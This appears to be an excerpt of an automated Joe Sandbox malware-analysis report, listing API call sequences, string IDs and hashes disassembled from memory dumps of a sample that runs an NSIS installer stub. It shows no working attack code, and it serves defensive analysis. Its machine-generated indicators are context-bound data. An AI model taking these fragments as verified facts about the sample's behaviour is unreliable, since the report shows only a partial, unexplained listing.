                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CharCurrentDeleteDirectoryEnvironmentModuleNextPathTempTokenVariableWindows$AddressAdjustCloseCommandCopyInfoInitializeLineLookupOpenPrivilegePrivilegesProcUninitializeValuelstrcmpilstrlen
                                                                                              • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$S|/$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 2120231667-3416784282
                                                                                              • Opcode ID: 31bcb9ab88596e7618d238e463a0a444f46f192003f7e4199dddc08b282c5ed6
                                                                                              • Instruction ID: 12dd7fb0a257894d9827c624f4711e14ee4955ca2babc5f6c7353189b25a6320
                                                                                              • Opcode Fuzzy Hash: 31bcb9ab88596e7618d238e463a0a444f46f192003f7e4199dddc08b282c5ed6
                                                                                              • Instruction Fuzzy Hash: 0391B470604241AAE7117F719D89A6F3EACEF8574AF00453FF541B61E2CB7C9A018B2E
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004048BA
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004048C5
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040490F
                                                                                              • LoadBitmapA.USER32(0000006E), ref: 00404922
                                                                                              • SetWindowLongA.USER32(?,000000FC,00404E99), ref: 0040493B
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040494F
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404961
                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404977
                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404983
                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404995
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404998
                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049C3
                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049CF
                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A64
                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A8F
                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AA3
                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404AD2
                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AE0
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404AF1
                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BEE
                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C53
                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C68
                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C8C
                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CAC
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404CC1
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404CD1
                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D4A
                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404DF3
                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E02
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E22
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404E70
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404E7B
                                                                                              • ShowWindow.USER32(00000000), ref: 00404E82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: b9002b5fa49d2a5998b6b1fb92d706362e2c576ea186a6eb5b486c85a42f0063
                                                                                              • Instruction ID: 76d2e208bb82396193868b8099a6daa05122b73eb358a4a137ee08f8801950ae
                                                                                              • Opcode Fuzzy Hash: b9002b5fa49d2a5998b6b1fb92d706362e2c576ea186a6eb5b486c85a42f0063
                                                                                              • Instruction Fuzzy Hash: F1026CB0900209AFEB14DF94DD85AAE7BB9FB84314F10813AF610BA2E1D7789D51CF58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,F]5$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$F]5
                                                                                              • API String ID: 0-2547322775
                                                                                              • Opcode ID: 26dd9311c70d38d616cc43b6f96bce9233c26b4ef6ccc373e77c93b5905f465d
                                                                                              • Instruction ID: df0733cec5552b272c93ff199a87dffb7db386f3272455127626c7b62a650c62
                                                                                              • Opcode Fuzzy Hash: 26dd9311c70d38d616cc43b6f96bce9233c26b4ef6ccc373e77c93b5905f465d
                                                                                              • Instruction Fuzzy Hash: E1122874A00319DFDB24DB69DC50B9DB7F2BF88304F2085A9D50AAB355DB31AD82CB81
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(?,?), ref: 004055D7
                                                                                              • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?), ref: 0040561F
                                                                                              • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?), ref: 00405640
                                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?), ref: 00405646
                                                                                              • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?), ref: 00405657
                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405715
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2035342205-1173974218
                                                                                              • Opcode ID: 3d14ed8e826454d0a7050cb6646e006fb12ceb621ce4d71a80f81d1c8044329c
                                                                                              • Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
                                                                                              • Opcode Fuzzy Hash: 3d14ed8e826454d0a7050cb6646e006fb12ceb621ce4d71a80f81d1c8044329c
                                                                                              • Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004050C2
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004050D1
                                                                                              • GetClientRect.USER32(?,?), ref: 0040510E
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405115
                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
                                                                                              • ShowWindow.USER32(?,00000008), ref: 004051B1
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004051D2
                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004050E0
                                                                                                • Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405223
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405238
                                                                                              • ShowWindow.USER32(00000000), ref: 0040525B
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405262
                                                                                              • ShowWindow.USER32(00000008), ref: 004052A8
                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
                                                                                              • CreatePopupMenu.USER32 ref: 004052ED
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 00405322
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405387
                                                                                              • EmptyClipboard.USER32 ref: 0040538D
                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004053A0
                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004053CD
                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 004053D8
                                                                                              • CloseClipboard.USER32 ref: 004053DE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: @y
                                                                                              • API String ID: 590372296-2793234042
                                                                                              • Opcode ID: c8f9996b3b12a23518fe7de3944cb1f319bc0aff7a081ead76a17017af42c36f
                                                                                              • Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
                                                                                              • Opcode Fuzzy Hash: c8f9996b3b12a23518fe7de3944cb1f319bc0aff7a081ead76a17017af42c36f
                                                                                              • Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
                                                                                              • ShowWindow.USER32(?), ref: 00403A77
                                                                                              • DestroyWindow.USER32 ref: 00403A8B
                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403AC8
                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403AE3
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403B91
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403B9B
                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001), ref: 00403C06
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403CAC
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403CCD
                                                                                              • EnableWindow.USER32(?,?), ref: 00403CDF
                                                                                              • EnableWindow.USER32(?,?), ref: 00403CFA
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403D17
                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
                                                                                              • lstrlenA.KERNEL32(0079E540,?,0079E540,007A1740), ref: 00403D6B
                                                                                              • SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403EAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                              • String ID: @y
                                                                                              • API String ID: 184305955-2793234042
                                                                                              • Opcode ID: 7df86cdf8d4c2e2bf014ccc18f35ae8683bb7fd218937165e1ce01e53578c62c
                                                                                              • Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
                                                                                              • Opcode Fuzzy Hash: 7df86cdf8d4c2e2bf014ccc18f35ae8683bb7fd218937165e1ce01e53578c62c
                                                                                              • Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E
                                                                                              APIs
                                                                                                • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                                                • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                                              • lstrcatA.KERNEL32(007A9000,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,771B3410,007A9400,007A8000), ref: 00403707
                                                                                              • lstrlenA.KERNEL32(007A0EE0,007A8400,?,?,007A0EE0,00000000,007A8400,007A9000,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,771B3410), ref: 0040377C
                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
                                                                                              • GetFileAttributesA.KERNEL32(007A0EE0), ref: 0040379A
                                                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,007A8400), ref: 004037E3
                                                                                                • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                                              • RegisterClassA.USER32(007A16E0), ref: 00403820
                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
                                                                                              • ShowWindow.USER32(00000005), ref: 004038A3
                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
                                                                                              • RegisterClassA.USER32(007A16E0), ref: 004038E5
                                                                                              • DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$@y$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                              • API String ID: 1975747703-30135874
                                                                                              • Opcode ID: cd40d4b1bdf5536e942b5a6c136c47e6f5008c8bfebe6efb88de06da33d0e514
                                                                                              • Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
                                                                                              • Opcode Fuzzy Hash: cd40d4b1bdf5536e942b5a6c136c47e6f5008c8bfebe6efb88de06da33d0e514
                                                                                              • Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004040D9
                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
                                                                                              • GetSysColor.USER32(?), ref: 00404108
                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
                                                                                              • lstrlenA.KERNEL32(?), ref: 00404129
                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040414D
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004041AF
                                                                                              • SendMessageA.USER32(00000000), ref: 004041B2
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041DD
                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
                                                                                              • SetCursor.USER32(00000000), ref: 00404235
                                                                                              • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00404255
                                                                                              • SetCursor.USER32(00000000), ref: 00404258
                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: N$open
                                                                                              • API String ID: 3615053054-904208323
                                                                                              • Opcode ID: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                                              • Instruction ID: 325d301b2710361d9817967eb08788495a0e15e312a989604f50e6602a626d4c
                                                                                              • Opcode Fuzzy Hash: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                                              • Instruction Fuzzy Hash: 9161C671A40209BFEB109F60DC45F6A7B69FB84744F10816AFB05BA2D1C7BCA951CF98
                                                                                              APIs
                                                                                              • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 004032D5
                                                                                              • GetWindowsDirectoryA.KERNEL32(007A9400,000003FB,?,007A8000,00000000,?,?,00000160), ref: 004032E6
                                                                                              • lstrcatA.KERNEL32(007A9400,\Temp,?,007A8000,00000000,?,?,00000160), ref: 004032F2
                                                                                              • GetTempPathA.KERNEL32(000003FC,007A9400,007A9400,\Temp,?,007A8000,00000000,?,?,00000160), ref: 00403306
                                                                                              • lstrcatA.KERNEL32(007A9400,Low,?,007A8000,00000000,?,?,00000160), ref: 0040330E
                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,007A9400,007A9400,Low,?,007A8000,00000000,?,?,00000160), ref: 0040331F
                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,007A9400,?,007A8000,00000000,?,?,00000160), ref: 00403327
                                                                                              • DeleteFileA.KERNEL32(007A9000), ref: 0040333B
                                                                                                • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,007A1740,NSIS Error), ref: 00405D19
                                                                                              • OleUninitialize.OLE32(?,?,007A8000,00000000,?,?,00000160), ref: 004033E9
                                                                                              • ExitProcess.KERNEL32 ref: 0040340A
                                                                                              • lstrcatA.KERNEL32(007A9400,~nsu,007A8000,?,?,?,007A8000,00000000,?,?,00000160), ref: 0040341D
                                                                                              • lstrcatA.KERNEL32(007A9400,0040914C,007A9400,~nsu,007A8000,?,?,?,007A8000,00000000,?,?,00000160), ref: 0040342C
                                                                                              • lstrcatA.KERNEL32(007A9400,.tmp,007A9400,~nsu,007A8000,?,?,?,007A8000,00000000,?,?,00000160), ref: 00403437
                                                                                              • lstrcmpiA.KERNEL32(007A9400,007A8C00), ref: 00403443
                                                                                              • SetCurrentDirectoryA.KERNEL32(007A9400,007A9400,?,?,?,007A8000,00000000,?,?,00000160), ref: 0040345F
                                                                                              • DeleteFileA.KERNEL32(0079D100,0079D100,?,007A3000,?,?,?,?,007A8000,00000000,?,?,00000160), ref: 004034B8
                                                                                              • CopyFileA.KERNEL32(007A9C00,0079D100,00000001), ref: 004034CC
                                                                                              • CloseHandle.KERNEL32(00000000,0079D100,0079D100,?,0079D100,?,?,?,?,007A8000,00000000,?,?,00000160), ref: 004034F9
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,007A8000,00000000,?,?,00000160), ref: 00403527
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,00000160), ref: 0040352E
                                                                                              • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 00403546
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,SeShutdownPrivilege,?,?,?,00000160), ref: 00403565
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                                              • ExitProcess.KERNEL32 ref: 004035AC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcat$Process$ExitFile$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableWindows$AdjustCloseCopyHandleLookupOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrcpyn
                                                                                              • String ID: $"$Error launching installer$Low$TEMP$TMP$\Temp
                                                                                              • API String ID: 109303428-2954788235
                                                                                              • Opcode ID: e57893c5a4b4b56e07fd3f320070d45fedc72311b9e01cbb27cc815fb34ee3c7
                                                                                              • Instruction ID: 52ba2056256e4fc5d81563e245770fdf21b793b40914789873f765571559dbb7
                                                                                              • Opcode Fuzzy Hash: e57893c5a4b4b56e07fd3f320070d45fedc72311b9e01cbb27cc815fb34ee3c7
                                                                                              • Instruction Fuzzy Hash: 9251E4306086925AE7256B355D9D62B7FA99B82306F0845BFE091761E3C77C4A04C72E
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextA.USER32(00000000,007A1740,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                                              • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                                              • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                                              • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                              APIs
                                                                                              • lstrcpyA.KERNEL32(007A02D0,NUL,00000000,00000000,?,?,00405BE8,?,?), ref: 00405A64
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405BE8,?,?), ref: 00405A88
                                                                                              • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91
